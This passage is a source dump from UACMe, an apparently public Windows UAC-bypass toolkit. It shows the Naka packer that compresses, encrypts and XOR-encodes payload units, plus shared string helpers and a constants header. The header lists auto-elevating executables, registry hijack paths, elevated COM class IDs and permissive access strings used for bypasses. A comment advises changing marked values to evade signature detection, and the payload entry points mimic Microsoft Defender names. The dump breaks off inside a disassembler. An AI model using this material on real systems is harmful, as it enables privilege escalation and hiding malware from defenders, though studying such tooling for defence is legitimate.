UnitHeader->cbDeltaSize = (DWORD)d_out.uSize; //original compressed delta size
RtlCopyMemory(UnitHeader->bIV, bIV, DCU_IV_MAX_BLOCK_LENGTH);
UnitHeader->HeaderCrc = RtlComputeCrc32(0, UnitHeader, sizeof(DCU_HEADER));
DataPtr = (PBYTE)UnitHeader + sizeof(DCU_HEADER);
RtlCopyMemory(DataPtr, pbEncryptedBuffer, cbEncryptedBuffer);
if (_filename_noext(NewName, lpInputFile)) {
_strcat(NewName, TEXT(".cd"));
supWriteBufferToFile(NewName, UnitHeader, (DWORD)sz);
}
HeapFree(GetProcessHeap(), 0, UnitHeader);
}
} while (FALSE);
if (d_out.lpStart)
DeltaFree(d_out.lpStart);
if (pbHash)
HeapFree(hHeap, 0, pbHash);
if (pbEncryptedBuffer)
HeapFree(hHeap, 0, pbEncryptedBuffer);
#ifdef _DEBUG
if (_filename_noext(NewName, lpInputFile)) {
_strcat(NewName, TEXT(".cd"));
if (_filename_noext(KeyName, lpInputFile)) {
_strcat(KeyName, TEXT(".key"));
DecompressContainerUnit(NewName, KeyName);
}
}
if (KeyName != NULL)
HeapFree(hHeap, 0, KeyName);
#endif
if (NewName != NULL)
HeapFree(hHeap, 0, NewName);
if (FileData != NULL)
HeapFree(hHeap, 0, FileData);
}
#define UACME_KEY_SIZE 32
#define UACME_MAX_UNITS 12 //set actual number from github version
#define AKAGI_XOR_KEY 'naka'
typedef struct _DCK_HEADER {
DWORD Id;
BYTE Data[UACME_KEY_SIZE];
} DCK_HEADER, *PDCK_HEADER;
/*
* EncodeBuffer
*
* Purpose:
*
* Decrypt/Encrypt given buffer.
*
*/
VOID EncodeBuffer(
PVOID Buffer,
ULONG BufferSize
)
{
ULONG k, c;
PUCHAR ptr;
if ((Buffer == NULL) || (BufferSize == 0))
return;
k = AKAGI_XOR_KEY;
c = BufferSize;
ptr = (PUCHAR)Buffer;
do {
*ptr ^= k;
k = _rotl(k, 1);
ptr++;
--c;
} while (c != 0);
}
//
// Keep in sync with Akagi
//
#define IDR_FUBUKI64 100
#define IDR_IKAZUCHI64 102
#define IDR_AKATSUKI64 103
#define IDR_KAMIKAZE64 104
#define IDR_FUBUKI32 200
#define IDR_IKAZUCHI32 202
#define IDR_KAMIKAZE 203
BOOL ProcessUnit(
_In_ PWSTR UnitKeyName,
_In_ ULONG UnitID,
_In_ PDCK_HEADER UnitHeader)
{
PWCHAR pBuffer;
LARGE_INTEGER fs;
pBuffer = (PWCHAR)supReadBufferFromFile(UnitKeyName, &fs);
if (pBuffer) {
if (fs.LowPart != UACME_KEY_SIZE) {
MessageBox(
GetDesktopWindow(),
L"Unexpected key size.",
NULL,
MB_ICONERROR);
return FALSE;
}
UnitHeader->Id = UnitID;
RtlCopyMemory(UnitHeader->Data, pBuffer, fs.LowPart);
HeapFree(GetProcessHeap(), 0, pBuffer);
}
else {
MessageBox(
GetDesktopWindow(),
L"File read error, memory not allocated.",
NULL,
MB_ICONERROR);
return FALSE;
}
return TRUE;
}
VOID CreateSecretTables(VOID)
{
INT c = 0;
SIZE_T l = 0;
DCK_HEADER S[UACME_MAX_UNITS];
WCHAR szFileName[MAX_PATH * 2];
RtlSecureZeroMemory(szFileName, sizeof(szFileName));
#ifdef _DEBUG
_strcpy(szFileName, L"Z:\\HE\\UACME\\Compress");
#else
GetCurrentDirectory(MAX_PATH, szFileName);
#endif
_strcat(szFileName, L"\\");
l = _strlen(szFileName);
szFileName[l] = 0;
//
// Build secrets64
//
c = 0;
RtlSecureZeroMemory(S, sizeof(S));
_strcat(&szFileName[l], L"Akatsuki64.key");
if (ProcessUnit(szFileName, IDR_AKATSUKI64, &S[c]))
c++;
szFileName[l] = 0;
_strcat(&szFileName[l], L"Fubuki64.key");
if (ProcessUnit(szFileName, IDR_FUBUKI64, &S[c]))
c++;
szFileName[l] = 0;
_strcat(&szFileName[l], L"Fubuki32.key");
if (ProcessUnit(szFileName, IDR_FUBUKI32, &S[c]))
c++;
szFileName[l] = 0;
_strcat(&szFileName[l], L"Kamikaze.key");
if (ProcessUnit(szFileName, IDR_KAMIKAZE64, &S[c]))
c++;
EncodeBuffer(S, c * sizeof(DCK_HEADER));
szFileName[l] = 0;
_strcat(&szFileName[l], L"secrets64.bin");
supWriteBufferToFile(szFileName, S, c * sizeof(DCK_HEADER));
//
// Build secrets32
//
c = 0;
RtlSecureZeroMemory(S, sizeof(S));
szFileName[l] = 0;
_strcat(&szFileName[l], L"Fubuki32.key");
if (ProcessUnit(szFileName, IDR_FUBUKI32, &S[c]))
c++;
szFileName[l] = 0;
_strcat(&szFileName[l], L"Kamikaze.key");
if (ProcessUnit(szFileName, IDR_KAMIKAZE, &S[c]))
c++;
EncodeBuffer(S, c * sizeof(DCK_HEADER));
szFileName[l] = 0;
_strcat(&szFileName[l], L"secrets32.bin");
supWriteBufferToFile(szFileName, S, c * sizeof(DCK_HEADER));
}
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
void main()
{
LPWSTR FirstParam = NULL;
LPWSTR *szArglist;
INT nArgs = 0;
szArglist = CommandLineToArgvW(GetCommandLineW(), &nArgs);
if (szArglist) {
if (nArgs > 1) {
FirstParam = szArglist[1];
if (FirstParam) {
if (_strcmpi(FirstParam, L"--stable") == 0) {
CreateSecretTables();
}
else {
CreateContainerPackedUnit(FirstParam);
}
}
}
else {
MessageBox(
GetDesktopWindow(),
TEXT("Input file not specified"),
TEXT("Naka"),
MB_ICONINFORMATION);
}
LocalFree(szArglist);
}
ExitProcess(0);
}
================================================
FILE: Source/Naka/naka.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018 - 2021
*
* TITLE: NAKA.H
*
* VERSION: 3.03
*
* DATE: 15 July 2021
*
* Common header file for Naka.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#if !defined UNICODE
#error ANSI build is not supported
#endif
#include "shared\libinc.h"
#pragma comment(lib, "msdelta.lib")
#pragma comment(lib, "Bcrypt.lib")
//disable nonmeaningful warnings.
#pragma warning(disable: 4005) // macro redefinition
#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s
#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER
#include
#include
#include
#include
#include "shared\ntos\ntos.h"
#include "shared\minirtl.h"
#include "shared\cmdline.h"
#include "shared\_filename.h"
#define UACME_CONTAINER_PACKED_UNIT 'UPCU' //Naka handling
#define UACME_CONTAINER_PACKED_DATA 'DPCU' //Naka handling
#define UACME_CONTAINER_PACKED_CODE 'CPCU' //Kuma handling
#define UACME_CONTAINER_PACKED_KEYS 'KPCU' //Kuma handling
//Initialization vector max bytes
#define DCU_IV_MAX_BLOCK_LENGTH 16
typedef struct _DCU_HEADER {
DWORD Magic;
DWORD cbData;
DWORD cbDeltaSize;
DWORD HeaderCrc;
BYTE bIV[DCU_IV_MAX_BLOCK_LENGTH];
//PBYTE pbData[1]; /* not a member of the structure */
} DCU_HEADER, *PDCU_HEADER;
================================================
FILE: Source/README.md
================================================
## Units
- Akagi, x64/x86-32 main executable file, contain payload/data units.
- Akatsuki, x64 payload, WOW64 logger.
- Fubuki, x64/x86-32 payload, general purpose.
- Kamikaze, data, MMC snap-in.
- Naka, x64/x86-32 compressor for other payload/data units.
- Yuubari, x64 UAC info data dumper.
## Other
- Shared, contain headers and source code shared between several projects.
================================================
FILE: Source/Shared/_filename.c
================================================
#include
#include "minirtl.h"
char *_filename_a(const char *f)
{
char *p = (char *)f;
if (f == 0)
return 0;
while (*f != (char)0) {
if (*f == '\\')
p = (char *)f + 1;
f++;
}
return p;
}
wchar_t *_filename_w(const wchar_t *f)
{
wchar_t *p = (wchar_t *)f;
if (f == 0)
return 0;
while (*f != (wchar_t)0) {
if (*f == (wchar_t)'\\')
p = (wchar_t *)f + 1;
f++;
}
return p;
}
char *_fileext_a(const char *f)
{
char *p = 0;
if (f == 0)
return 0;
while (*f != (char)0) {
if (*f == '.')
p = (char *)f;
f++;
}
if (p == 0)
p = (char *)f;
return p;
}
wchar_t *_fileext_w(const wchar_t *f)
{
wchar_t *p = 0;
if (f == 0)
return 0;
while (*f != (wchar_t)0) {
if (*f == (wchar_t)'.')
p = (wchar_t *)f;
f++;
}
if (p == 0)
p = (wchar_t *)f;
return p;
}
char *_filename_noext_a(char *dest, const char *f)
{
char *p, *l, *dot;
if ((f == 0) || (dest == 0))
return 0;
p = _filename_a(f);
if (p == 0)
return 0;
dot = _strend_a(p);
if (dot == 0)
return 0;
l = p;
while (*l != (char)0)
{
if (*l == '.')
dot = l;
l++;
}
while (p0) );
return (int)(c1 - c2);
}
int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
{
wchar_t c1, c2;
if ( s1==s2 )
return 0;
if ( s1==0 )
return -1;
if ( s2==0 )
return 1;
if ( cchars==0 )
return 0;
do {
c1 = *s1;
c2 = *s2;
s1++;
s2++;
cchars--;
} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
return (int)(c1 - c2);
}
================================================
FILE: Source/Shared/_strncmpi.c
================================================
#include "rtltypes.h"
int _strncmpi_a(const char *s1, const char *s2, size_t cchars)
{
char c1, c2;
if ( s1==s2 )
return 0;
if ( s1==0 )
return -1;
if ( s2==0 )
return 1;
if ( cchars==0 )
return 0;
do {
c1 = locase_a(*s1);
c2 = locase_a(*s2);
s1++;
s2++;
cchars--;
} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
return (int)(c1 - c2);
}
int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
{
wchar_t c1, c2;
if ( s1==s2 )
return 0;
if ( s1==0 )
return -1;
if ( s2==0 )
return 1;
if ( cchars==0 )
return 0;
do {
c1 = locase_w(*s1);
c2 = locase_w(*s2);
s1++;
s2++;
cchars--;
} while ( (c1 != 0) && (c1 == c2) && (cchars>0) );
return (int)(c1 - c2);
}
================================================
FILE: Source/Shared/_strncpy.c
================================================
#include "rtltypes.h"
char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)
{
char *p;
if ( (dest==0) || (src==0) || (ccdest==0) )
return dest;
ccdest--;
p = dest;
while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {
*p = *src;
p++;
src++;
ccdest--;
ccsrc--;
}
*p = 0;
return dest;
}
wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)
{
wchar_t *p;
if ( (dest==0) || (src==0) || (ccdest==0) )
return dest;
ccdest--;
p = dest;
while ( (*src!=0) && (ccdest>0) && (ccsrc>0) ) {
*p = *src;
p++;
src++;
ccdest--;
ccsrc--;
}
*p = 0;
return dest;
}
================================================
FILE: Source/Shared/_strstri.c
================================================
#include "rtltypes.h"
char *_strstri_a(const char *s, const char *sub_s)
{
char c0, c1, c2, *tmps, *tmpsub;
if (s == sub_s)
return (char *)s;
if (s == 0)
return 0;
if (sub_s == 0)
return 0;
c0 = locase_a(*sub_s);
while (c0 != 0) {
while (*s != 0) {
c2 = locase_a(*s);
if (c2 == c0)
break;
s++;
}
if (*s == 0)
return 0;
tmps = (char *)s;
tmpsub = (char *)sub_s;
do {
c1 = locase_a(*tmps);
c2 = locase_a(*tmpsub);
tmps++;
tmpsub++;
} while ((c1 == c2) && (c2 != 0));
if (c2 == 0)
return (char *)s;
s++;
}
return 0;
}
wchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s)
{
wchar_t c0, c1, c2, *tmps, *tmpsub;
if (s == sub_s)
return (wchar_t *)s;
if (s == 0)
return 0;
if (sub_s == 0)
return 0;
c0 = locase_w(*sub_s);
while (c0 != 0) {
while (*s != 0) {
c2 = locase_w(*s);
if (c2 == c0)
break;
s++;
}
if (*s == 0)
return 0;
tmps = (wchar_t *)s;
tmpsub = (wchar_t *)sub_s;
do {
c1 = locase_w(*tmps);
c2 = locase_w(*tmpsub);
tmps++;
tmpsub++;
} while ((c1 == c2) && (c2 != 0));
if (c2 == 0)
return (wchar_t *)s;
s++;
}
return 0;
}
================================================
FILE: Source/Shared/cmdline.c
================================================
#include
BOOL GetCommandLineParamW(
IN LPCWSTR CmdLine,
IN ULONG ParamIndex,
OUT LPWSTR Buffer,
IN ULONG BufferSize,
OUT PULONG ParamLen
)
{
ULONG c, plen = 0;
WCHAR divider;
if (ParamLen != NULL)
*ParamLen = 0;
if (CmdLine == NULL) {
if ((Buffer != NULL) && (BufferSize > 0))
*Buffer = 0;
return FALSE;
}
for (c = 0; c <= ParamIndex; c++) {
plen = 0;
while (*CmdLine == ' ')
CmdLine++;
switch (*CmdLine) {
case 0:
goto zero_term_exit;
case '"':
CmdLine++;
divider = '"';
break;
default:
divider = ' ';
}
while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
plen++;
if (c == ParamIndex)
if ((plen < BufferSize) && (Buffer != NULL)) {
*Buffer = *CmdLine;
Buffer++;
}
CmdLine++;
}
if (*CmdLine != 0)
CmdLine++;
}
zero_term_exit:
if ((Buffer != NULL) && (BufferSize > 0))
*Buffer = 0;
if (ParamLen != NULL)
*ParamLen = plen;
if (plen < BufferSize)
return TRUE;
else
return FALSE;
}
BOOL GetCommandLineParamA(
IN LPCSTR CmdLine,
IN ULONG ParamIndex,
OUT LPSTR Buffer,
IN ULONG BufferSize,
OUT PULONG ParamLen
)
{
ULONG c, plen = 0;
CHAR divider;
if (CmdLine == NULL)
return FALSE;
if (ParamLen != NULL)
*ParamLen = 0;
for (c = 0; c <= ParamIndex; c++) {
plen = 0;
while (*CmdLine == ' ')
CmdLine++;
switch (*CmdLine) {
case 0:
goto zero_term_exit;
case '"':
CmdLine++;
divider = '"';
break;
default:
divider = ' ';
}
while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
plen++;
if (c == ParamIndex)
if ((plen < BufferSize) && (Buffer != NULL)) {
*Buffer = *CmdLine;
Buffer++;
}
CmdLine++;
}
if (*CmdLine != 0)
CmdLine++;
}
zero_term_exit:
if ((Buffer != NULL) && (BufferSize > 0))
*Buffer = 0;
if (ParamLen != NULL)
*ParamLen = plen;
if (plen < BufferSize)
return TRUE;
else
return FALSE;
}
char *ExtractFilePathA(const char *FileName, char *FilePath)
{
char *p = (char *)FileName, *p0 = (char *)FileName;
if ((FileName == 0) || (FilePath == 0))
return 0;
while (*FileName != 0) {
if (*FileName == '\\')
p = (char *)FileName + 1;
FileName++;
}
while (p0 < p) {
*FilePath = *p0;
FilePath++;
p0++;
}
*FilePath = 0;
return FilePath;
}
wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath)
{
wchar_t *p = (wchar_t *)FileName, *p0 = (wchar_t *)FileName;
if ((FileName == 0) || (FilePath == 0))
return 0;
while (*FileName != 0) {
if (*FileName == '\\')
p = (wchar_t *)FileName + 1;
FileName++;
}
while (p0 < p) {
*FilePath = *p0;
FilePath++;
p0++;
}
*FilePath = 0;
return FilePath;
}
================================================
FILE: Source/Shared/cmdline.h
================================================
#ifndef _CMDLINEH_
#define _CMDLINEH_
BOOL GetCommandLineParamW(
IN LPCWSTR CmdLine,
IN ULONG ParamIndex,
OUT LPWSTR Buffer,
IN ULONG BufferSize,
OUT PULONG ParamLen
);
BOOL GetCommandLineParamA(
IN LPCSTR CmdLine,
IN ULONG ParamIndex,
OUT LPSTR Buffer,
IN ULONG BufferSize,
OUT PULONG ParamLen
);
char *ExtractFilePathA(const char *FileName, char *FilePath);
wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);
#ifdef UNICODE
#define ExtractFilePath ExtractFilePathW
#define GetCommandLineParam GetCommandLineParamW
#else // ANSI
#define ExtractFilePath ExtractFilePathA
#define GetCommandLineParam GetCommandLineParamA
#endif
#endif /* _CMDLINEH_ */
================================================
FILE: Source/Shared/consts.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2025
*
* TITLE: CONSTS.H
*
* VERSION: 3.69
*
* DATE: 14 Dec 2025
*
* Global consts definition file.
*
* If you are looking for unique enough pattern look for values/regions marked as "PYSH".
* Get rid of these values, or customize them otherwise.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
#define AKAGI_XOR_KEY 'naka'
#define AKAGI_XOR_KEY2 ' pta'
//"UACMe"
#define ISDB_PROGRAMNAME 6
#define UCM_VERSION_MAJOR 3
#define UCM_VERSION_MINOR 6
#define UCM_VERSION_REVISION 9
#define UCM_VERSION_BUILD 2512
#define SUPRUNPROCESS_TIMEOUT_DEFAULT 12000
//
// A very long list for future use.
//
#define UACME_SHARED_BASE_ID 'sTlA'
//
// Trash end char.
//
#define UCM_TRASH_END_CHAR L'~'
//
// WORD sized id list.
//
#define AKAGI_COMPLETION_EVENT_ID 'ab'
#define AKAGI_SHARED_SECTION_ID 'cd'
#define AKAGI_BDESCRIPTOR_NAME_ID 'ef'
#define FUBUKI_SYNC_MUTEX_ID 'a1'
#define FUBUKI_PCA_SECTION_ID '0f'
#define FUBUKI_PCA_EVENT_ID '1f'
#define FUBUKI_PCA_PAYLOAD_RUN (0x1)
#define FUBUKI_PCA_LOADER_RUN (0x2)
#define FUBUKI_PCA_ALL_RUN (FUBUKI_PCA_PAYLOAD_RUN | FUBUKI_PCA_LOADER_RUN)
//
// Kamikaze consts
//
#define KAMIKAZE_MARKER "https"
#define WF_MSC L"wf.msc"
#define T_DEFAULT_DESKTOP L"WinSta0\\Default"
#define T_WINDOWS_CURRENT_VERSION L"MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"
#pragma region PYSH
#define T_DISPLAY_CALIBRATION L"Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration"
#define T_PCA_STORE L"Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store"
#define T_APPCOMPAT_LAYERS L"Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers"
#define T_PCA_PERSISTED L"Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Persisted"
#define T_APP_ASSOC_TOASTS L"Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationAssociationToasts"
#define T_HTMLHELP_AUTHOR L"Software\\Microsoft\\HtmlHelp Author"
#define T_WEBVIEW_POLICY L"Software\\Policies\\Microsoft\\Edge\\WebView2\\BrowserExecutableFolder"
#define T_CURVER L"CurVer"
#define T_MSSETTINGS L"ms-settings"
#define T_MSWINDOWSSTORE L"ms-windows-store"
#define T_QUICKASSIST L"ms-quick-assist:"
#define T_CLASSESFOLDER L"Folder"
#define T_LAUNCHERSYSTEMSETTINGS L"Launcher.SystemSettings"
#define T_LOCATION L"Location"
#define ELLOCNAK_MSU L"update.msu"
#define RUN_CMD_COMMAND L" /c start "
#define T_APPXSVC L"AppXSvc"
#define T_PCASVC L"PcaSvc"
#pragma endregion
#define T_SOFTWARE_CLASSES L"Software\\Classes"
#define T_SHELL_OPEN L"\\shell\\open"
#define T_SHELL_COMMAND L"command"
#define T_URL_PROTOCOL L"URL Protocol"
#define T_URL_MS_WIN_STORE L"URL:ms-windows-store"
#define T_SDDL_ALL_FOR_EVERYONE L"D:(A;;GA;;;WD)"
#define T_SDDL_EVERYONE_FULL_ACCESS L"D:PAI(A;OICI;FA;;;WD)"
#define T_WINDIR L"windir"
#define T_SYSTEMROOT L"systemroot"
#define T_WINDOWSMEDIAPLAYER L"Windows Media Player"
#define T_DELEGATEEXECUTE L"DelegateExecute"
#define T_PROTO_HTTP L"http"
//
// Unit names and entrypoints
//
#pragma region PYSH
#define KAMIKAZE_MSC L"kmkze.msc"
#define KAMIKAZE_LAUNCHER L"readme.html"
#define FUBUKI_EXT_ENTRYPOINT "MpManagerOpen"
#define FUBUKI_WND_HOOKPROC "MpHandleClose"
#define FUBUKI_DEFAULT_ENTRYPOINT "MpScanStart"
#define FUBUKI_ENTRYPOINT_UIACCESS2 "MpScanControl"
#define FUBUKI_ENTRYPOINT_UIACCESS3 "MpUpdateEngine"
#define FUBUKI_ENTRYPOINT_SXS "MpThreatOpen"
#define FUBUKI_ENTRYPOINT_PCAEXE "MpManagerStatusQuery"
#define FUBUKI_ENTRYPOINT_PCADLL "MpManagerStatusQueryEx"
#define FUBUKI_ENTRYPOINT_QASSIST "MpThreatEnumerate"
#define AKATSUKI_ENTRYPOINT_EXE "Wow64LogMessageArgList"
#pragma endregion
//
// Windows dll names
//
#define APISET_KERNEL32LEGACY L"api-ms-win-core-kernel32-legacy-l1.DLL"
#define ATL_DLL L"ATL.dll"
#define BLUETOOTHDIAGNOSTICUTIL_DLL L"BluetoothDiagnosticUtil.dll"
#define COMCTL32_DLL L"comctl32.dll"
#define DISMCORE_DLL L"dismcore.dll"
#define DUSER_DLL L"duser.dll"
#define EMBEDDEDBROWSERWEBVIEW_DLL L"EmbeddedBrowserWebView.dll"
#define GDIPLUS_DLL L"GdiPlus.dll"
#define ISCSIEXE_DLL L"iscsiexe.dll"
#define OSKSUPPORT_DLL L"OskSupport.dll"
#define PCADM_DLL L"pcadm.dll"
#define PERFORMANCETRACEHANDLER_DLL L"PerformanceTraceHandler.dll"
#define SHELL32_DLL L"shell32.dll"
#define WINMM_DLL L"winmm.dll"
#define WOW64LOG_DLL L"wow64log.dll"
//
// Native image cache targets
//
#define ASSEMBLY_MMCEX L"MMCEx"
#define MMCEX_NI_DLL L"MMCEx.ni.dll"
#define MMCEX_NI_DLL_AUX L"MMCEx.ni.dll.aux"
#define ASSEMBLY_ACCESSIBILITY L"Accessibility"
//
// Windows executables
//
#define CMD_EXE L"cmd.exe"
#define CLIPUP_EXE L"Clipup.exe"
#define COMPUTERDEFAULTS_EXE L"computerdefaults.exe"
#define CONSENT_EXE L"consent.exe"
#define DCCW_EXE L"dccw.exe"
#define EVENTVWR_EXE L"eventvwr.exe"
#define EXPLORER_EXE L"explorer.exe"
#define FODHELPER_EXE L"fodhelper.exe"
#define ISCSICPL_EXE L"iscsicpl.exe"
#define MMC_EXE L"mmc.exe"
#define MSCONFIG_EXE L"msconfig.exe"
#define MSCHEDEXE_EXE L"mschedexe.exe"
#define MSDT_EXE L"msdt.exe"
#define OSK_EXE L"osk.exe"
#define PKGMGR_EXE L"pkgmgr.exe"
#define QUICKASSIST_EXE L"QuickAssist.exe"
#define SDCLT_EXE L"sdclt.exe"
#define SLUI_EXE L"slui.exe"
#define TASKHOSTW_EXE L"taskhostw.exe"
#define WINSAT_EXE L"winsat.exe"
#define WINVER_EXE L"winver.exe"
#define WSRESET_EXE L"WSReset.exe"
#define WUSA_EXE L"wusa.exe"
//
// Windows subdirectories
//
// system32 only name
#define SYSTEM32_DIR_NAME L"system32"
// system32 with both sides slash
#define SYSTEM32_DIR L"\\system32\\"
// syswow64 with both sides slash
#define SYSWOW64_DIR L"\\syswow64\\"
#define NET2_DIR L"v2.0.50727"
#define NET4_DIR L"v4.0.30319"
#define MSNETFRAMEWORK_DIR L"Microsoft.NET\\Framework"
#define MMCEX_DIR L"\\MMCEx"
#define WBEM_DIR L"wbem\\"
#define WEBVIEW_DIR L"EBWebView"
//
// Shell Verbs
//
#define RUNAS_VERB L"runas"
//
// Windows MMC snap-ins
//
#define EVENTVWR_MSC L"eventvwr.msc"
#define WMIMGMT_MSC L"WmiMgmt.msc"
//
// Units specific values
//
#define MYSTERIOUSCUTETHING L"pe386" //PYSH
#define ABSOLUTEWIN L"lzx32" //PYSH
#define THEOLDNEWTHING L"hui32" //PYSH
//
// SxS
//
#define LOCAL_SXS L".local" //PYSH
#define FAKE_LOCAL_SXS L".@" //PYSH
#define COMCTL32_SXS L"microsoft.windows.common-controls"
#define GDIPLUS_SXS L"microsoft.windows.gdiplus"
//
// System consts
//
#define T_VOLATILE_ENV L"Volatile Environment"
#define T_REGISTRY_PREP L"\\REGISTRY\\" //end slash included
//
// COR profiler
//
#define COR_PROFILER L"COR_PROFILER"
#define COR_PROFILER_PATH L"COR_PROFILER_PATH"
#define COR_ENABLE_PROFILING L"COR_ENABLE_PROFILING"
//
// WebView environment variable
//
#define WEBVIEW2_FOLRDER_VAR L"WEBVIEW2_BROWSER_EXECUTABLE_FOLDER"
//
// DCCW calibrator
//
#define T_CALIBRATOR_VALUE L"DisplayCalibrator" //PYSH
//
// COM related trash
//
#define T_REG_SOFTWARECLASSESCLSID L"Software\\Classes\\CLSID\\"
#define T_REG_INPROCSERVER32 L"\\InProcServer32"
#define T_REG_SHELLFOLDER L"\\ShellFolder"
#define T_THREADINGMODEL L"ThreadingModel"
#define T_APARTMENT L"Apartment"
//
// COM objects elevation
//
#pragma region PYSH
#define T_CLSID_ColorDataProxy L"{D2E7041B-2927-42fb-8E9F-7CE93B6DC937}"
#define T_CLSID_CMSTPLUA L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define T_CLSID_FwCplLua L"{752438CB-E941-433F-BCB4-8B7D2329F0C8}"
#define T_CLSID_FileOperation L"{3AD05575-8857-4850-9277-11B85BDB8E09}"
#define T_CLSID_ShellSecurityEditor L"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}"
#define T_CLSID_EditionUpgradeManager L"{17CCA47D-DAE5-4E4A-AC42-CC54E28F334A}"
#define T_CLSID_IEAAddonInstaller L"{BDB57FF2-79B9-4205-9447-F5FE85F37312}"
#define T_CLSID_SecurityCenter L"{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}"
#define T_CLSID_VFServer L"{A6BFEA43-501F-456F-A845-983D3AD7B8F0}"
#define T_CLSID_VFServerDiagCpl L"{12C21EA7-2EB8-4B55-9249-AC243DA8C666}"
#define T_CLSID_DiagnosticProfile L"{D0B7E02C-E1A3-11DC-81FF-001185AE5E76}"
#pragma endregion
//
// Moniker(s)
//
#define T_ELEVATION_MONIKER_ADMIN L"Elevation:Administrator!new:"
//
// RPC interface UUID
//
#define APPINFO_RPC TEXT("201ef99a-7fa0-444c-9399-19ba84f12a1a")
#define PCASVC_RPC TEXT("0767a036-0d22-48aa-ba69-b619480f38cb")
================================================
FILE: Source/Shared/hde/hde64.c
================================================
/*
* Hacker Disassembler Engine 64 C
* Copyright (c) 2008-2009, Vyacheslav Patkov.
* All rights reserved.
*
*/
#include "hde64.h"
#include "table64.h"
#pragma warning(push)
#pragma warning(disable:4701)
#pragma warning(disable:4706)
unsigned int hde64_disasm(const void *code, hde64s *hs)
{
uint8_t x, c = 0, *p = (uint8_t *)code, cflags, opcode, pref = 0;
uint8_t *ht = hde64_table, m_mod, m_reg, m_rm, disp_size = 0;
uint8_t op64 = 0;
// Avoid using memset to reduce the footprint.
#ifndef _MSC_VER
memset((LPBYTE)hs, 0, sizeof(hde64s));
#else
__stosb((LPBYTE)hs, 0, sizeof(hde64s));
#endif
for (x = 16; x; x--)
switch (c = *p++) {
case 0xf3:
hs->p_rep = c;
pref |= PRE_F3;
break;
case 0xf2:
hs->p_rep = c;
pref |= PRE_F2;
break;
case 0xf0:
hs->p_lock = c;
pref |= PRE_LOCK;
break;
case 0x26: case 0x2e: case 0x36:
case 0x3e: case 0x64: case 0x65:
hs->p_seg = c;
pref |= PRE_SEG;
break;
case 0x66:
hs->p_66 = c;
pref |= PRE_66;
break;
case 0x67:
hs->p_67 = c;
pref |= PRE_67;
break;
default:
goto pref_done;
}
pref_done:
hs->flags = (uint32_t)pref << 23;
if (!pref)
pref |= PRE_NONE;
if ((c & 0xf0) == 0x40) {
hs->flags |= F_PREFIX_REX;
if ((hs->rex_w = (c & 0xf) >> 3) && (*p & 0xf8) == 0xb8)
op64++;
hs->rex_r = (c & 7) >> 2;
hs->rex_x = (c & 3) >> 1;
hs->rex_b = c & 1;
if (((c = *p++) & 0xf0) == 0x40) {
opcode = c;
goto error_opcode;
}
}
if ((hs->opcode = c) == 0x0f) {
hs->opcode2 = c = *p++;
ht += DELTA_OPCODES;
} else if (c >= 0xa0 && c <= 0xa3) {
op64++;
if (pref & PRE_67)
pref |= PRE_66;
else
pref &= ~PRE_66;
}
opcode = c;
cflags = ht[ht[opcode / 4] + (opcode % 4)];
if (cflags == C_ERROR) {
error_opcode:
hs->flags |= F_ERROR | F_ERROR_OPCODE;
cflags = 0;
if ((opcode & -3) == 0x24)
cflags++;
}
x = 0;
if (cflags & C_GROUP) {
uint16_t t;
t = *(uint16_t *)(ht + (cflags & 0x7f));
cflags = (uint8_t)t;
x = (uint8_t)(t >> 8);
}
if (hs->opcode2) {
ht = hde64_table + DELTA_PREFIXES;
if (ht[ht[opcode / 4] + (opcode % 4)] & pref)
hs->flags |= F_ERROR | F_ERROR_OPCODE;
}
if (cflags & C_MODRM) {
hs->flags |= F_MODRM;
hs->modrm = c = *p++;
hs->modrm_mod = m_mod = c >> 6;
hs->modrm_rm = m_rm = c & 7;
hs->modrm_reg = m_reg = (c & 0x3f) >> 3;
if (x && ((x << m_reg) & 0x80))
hs->flags |= F_ERROR | F_ERROR_OPCODE;
if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) {
uint8_t t = opcode - 0xd9;
